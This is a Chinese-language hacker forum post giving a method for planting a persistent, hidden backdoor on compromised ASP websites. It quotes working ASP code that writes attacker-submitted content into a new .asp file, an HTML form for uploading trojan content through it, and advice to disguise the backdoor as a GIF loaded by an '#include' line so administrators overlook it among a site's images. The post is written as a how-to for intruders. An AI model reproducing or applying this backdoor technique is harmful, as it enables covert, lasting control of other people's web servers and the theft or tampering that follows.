留網頁後門又一招~~
關於臭要飯的! 的腳本插入圖片我沒有試驗成功,俺比較愚鈍~~
但是發現他說的是一個好辦法!
這裏引用他教程裏的原文:
-----------------------------------------------------
我的插入圖片的腳本:
<%
If Request("a")<>"" Then
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
fdata = request("a")
Set objCountFile = objFSO.createTextFile(server.mappath("/kxlzx.asp"),True)
objCountFile.Write fdata
End If
%>
這段代碼主要就是在網站根目錄下生成一個kxlzx.asp文件。(我改了)
文件內容是由我們提交的數據.用request("a")來獲取的。
這段代碼插入到圖片中去。
本地自己構建一個提交表單向ASP文件提交(加入圖片那個文件)
表單文本框輸入內容名稱是:a
表單代碼:
<form method="POST" action="插入木馬圖片的ASP文件地址" target=_new>
<textarea rows="8" name="a" cols="75">輸入木馬的內容</textarea><br>
<input type="submit" value="提交" name="B1">
</form>
--------------------------------------------------------
我按照他說的做,用工具生成木馬,卻出現:在頁面上很多亂碼類東西.
這不是不打自招麼?
所以,我沒有成功,不過他說的是好辦法!
反正只要一句話
<!--#include file="aaa.gif" -->
放在任何一個asp文件中就可以了,那就好!
記得我們曾有過吧asp文件改名爲gif然後再改回來的入侵方式,現在套用前面,不過不用改回來了~
把<!--#include file="aaa.gif" -->
插入進去不就得了??
同樣的道理,想想吧,流行的建站程序,還有流行的論壇,哪一個不是gif大堆?
我們放進去一個假的,誰知道???
管理員還會閒着沒事做打開幾百個圖片慢慢欣賞?
除非是黃的~~~~
呵呵!
你只要有了上傳文件,和更改部分asp文件內容的權利。
我們可以執行他教程裏下面的部分。首先條件是我們拿到了webshell,或者是在某些管理後臺可以更改某一個asp葉面,都行。靈活運用嘛~